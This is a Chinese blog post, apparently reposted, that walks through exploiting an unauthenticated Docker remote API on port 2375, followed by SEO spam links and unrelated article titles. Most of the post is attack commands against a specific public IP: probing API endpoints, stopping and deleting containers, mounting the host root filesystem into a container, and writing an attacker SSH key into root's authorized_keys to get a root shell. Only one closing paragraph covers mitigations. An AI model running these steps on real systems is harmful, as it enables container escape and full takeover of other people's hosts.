当前位置: 首页 > wzjs >正文

建设网站有什么风险东莞设计网站建设

建设网站有什么风险,东莞设计网站建设,广告推广怎么做,购物网站开发的管理可行性Docker API 未授权访问 是一个非常严重的安全漏洞,可能导致严重的安全风险。 什么是 Docker API ? Docker API 是 Docker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,…

Docker API 未授权访问 是一个非常严重的安全漏洞,可能导致严重的安全风险。

什么是 Docker API ?

Docker API 是 Docker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,用户可以通过 HTTP 请求来执行诸如创建、启动、停止、删除容器等操作。同时,Docker API 还允许用户管理镜像、网络、卷等 Docker 资源。用户可以使用任何支持 HTTP 请求的工具或库来访问 Docker API,从而实现与 Docker 容器平台的集成和自动化管理。

Docker API 未授权访问 

漏洞背景

Docker 守护进程(Docker Daemon)默认监听在 Unix 套接字(`unix:///var/run/docker.sock`)上,但有时为了方便管理,用户会将 Docker API 暴露在 TCP 端口(如 `2375` 或 `2376`)上。如果未正确配置访问控制(如未启用 TLS 加密和认证),攻击者可以直接访问 Docker API,从而完全控制 Docker 主机及其容器。

漏洞复现

1、快速搭建环境

dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375

如果出现如下报错,表明 Docker 守护进程在启动时失败了,原因是 docker 守护进程已经在运行

停止进程,重新执行刚才的命令,环境搭建成功

#1、确认 Docker 守护进程是否正在运行
ps aux | grep dockerd
#2、如果正在运行,先停止它
sudo systemctl stop docker

2、浏览器访问,这样即存在 Docker API 未授权访问漏洞

常见探测路径

http://39.105.123.35:2375/version
http://39.105.123.35:2375/info
http://39.105.123.35:2375/images/json
http://39.105.123.35:2375/containers/json    

3、攻击者便可以远程通过Docker客户端连接,以下为常见操作

#列出所有容器
docker -H 39.105.123.35 ps -a
#查看镜像
docker -H 39.105.123.35 images
#拉取镜像
docker -H 39.105.123.35 pull ubuntu
#停止一个已经运行的容器
docker -H 39.105.123.35 stop c198868f6660
#删除容器
docker -H 39.105.123.35 rm c198868f6660
#进入容器
docker -H 39.105.123.35 exec -it 08d28346ff2d /bin/bash

4、写公钥获取shell

#生成公钥
ssh-keygen -t rsa
#查看生成的公钥
cat /root/.ssh/id_rsa.pub
#运行一个容器挂载宿主机的根目录到容器/mnt目录
docker -H tcp://39.105.123.35 run -it -v /:/mnt --entrypoint /bin/bash nginx
#写入公钥到宿主机
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBA/ZttXREVO+V615UhA2GoQvfmy1JnyJ0eqPnDlAyMxTi9Jahr0IBzqfxk+6hZzdy1a22YwnAOYnSvjkpR8eOYnxb0UoVmXpWMRNqW34v8liJGbc6m1Y5FsottqZfZVRe1UzfvuuOPnUW+oboqT5SvGSH0EXKiQoNFy4fafxHv2mO5E3roac1G1CbA/oPhbnFzFy8qcYjpc1BwSYG60+0IUutX+j2GasXFsieHKyV9U6a9vWLW4OkNUjCnzc/NEbgP/JG7t19NOHrjp4+IA7MGoCfui6G7j8a+PKslJG1hKu/B6frVfWNHVMQkBcmBxZtcmnCxeu+e10YiBtEPi+7 root@master-1" > /mnt/root/.ssh/authorized_keys

5、容器逃逸:连接目标主机获取shell

ssh root@39.105.123.35 -i id_rsa

总结

Docker API 未授权访问是一个高危漏洞,可能导致容器逃逸、数据泄露、恶意软件部署等严重后果。通过正确配置 TLS 加密、访问控制和防火墙规则,可以有效降低风险。同时,建议定期进行安全审计和漏洞扫描,确保 Docker 环境的安全性。 


文章转载自:

http://X1kWdvAS.ghwtn.cn
http://s1BWj9IB.ghwtn.cn
http://YLHnDdrX.ghwtn.cn
http://xF54I52R.ghwtn.cn
http://IuaZFBVl.ghwtn.cn
http://CsxxvR1v.ghwtn.cn
http://f1zSLErp.ghwtn.cn
http://V9MMKpYO.ghwtn.cn
http://K4seaLzz.ghwtn.cn
http://8cxosiT4.ghwtn.cn
http://3OmygfOR.ghwtn.cn
http://h38JSHpc.ghwtn.cn
http://oG0IvWEH.ghwtn.cn
http://LQXuaaxE.ghwtn.cn
http://NtyKBg0O.ghwtn.cn
http://zALMeaHx.ghwtn.cn
http://r5b4uisx.ghwtn.cn
http://lDxor5yz.ghwtn.cn
http://ztjs2lVw.ghwtn.cn
http://8f1sYouV.ghwtn.cn
http://wJVIWUmV.ghwtn.cn
http://ykw2LvTo.ghwtn.cn
http://uFDW5S9F.ghwtn.cn
http://CgWY1GSf.ghwtn.cn
http://oipdojdl.ghwtn.cn
http://4bGUIcvg.ghwtn.cn
http://HQHKDePM.ghwtn.cn
http://eSIarlbI.ghwtn.cn
http://iq4DgZ3f.ghwtn.cn
http://9yOLBDvq.ghwtn.cn
http://www.dtcms.com/wzjs/710608.html

相关文章:

  • 怎样做企业的网站上海网站设计工作室
  • .org做商业网站太原网站制作推广
  • 做网站一般什么价格开封美食网站建设规划
  • 甘肃购物网站建设做传奇网站
  • 公司网站是用什么软件做一个完整的工程项目流程
  • 国内大型的网站建设常熟网站
  • 南宁建站热搜深圳开发公司
  • 写小说赚钱的网站厦门做网站优化的公司
  • flash网站大全大连产品设计公司有哪些
  • 青岛网站建邯郸百姓网免费发布信息
  • 东阿聊城做网站的公司惠州网红酒店
  • 做免费嗳暧视频网站网站平台建设流程
  • 有哪些做废品的网站ps做网站字体用多大的
  • 手机用什么软件做网站淘宝付费推广
  • 网站建设合同规定传播易广告投放平台
  • 好多职业培训网站是怎么做的企业咨询公司是不是骗子
  • 雏光 网络推广 网站建设白云区新闻
  • wordpress如何开启阿里云cdn网站优化 ppt
  • 网站举报多久有结果建设网站设计论文范文
  • 盐亭县建设局网站网站专题页做多大尺寸
  • 电子商城网站设计嘉兴论坛网站建设
  • 乌市做网站的公司郑州做网站助企
  • 做交互设计的网站江北网站建设
  • 怎样用网站做淘宝推广wordpress login_head
  • 山西省旅游网站建设分析怎么开微商城网店步骤
  • 全网普盖网站建设河南网站安全查询系统
  • 开网站需要租用机房服务器价格百度网站域名
  • 主流媒体网站建设陕西西乡网站建设
  • 腾讯云域名备案需要提供网站建设方案书温州微网站制作多少钱
  • 河间专业做网站电话辽宁沈阳建设工程信息网站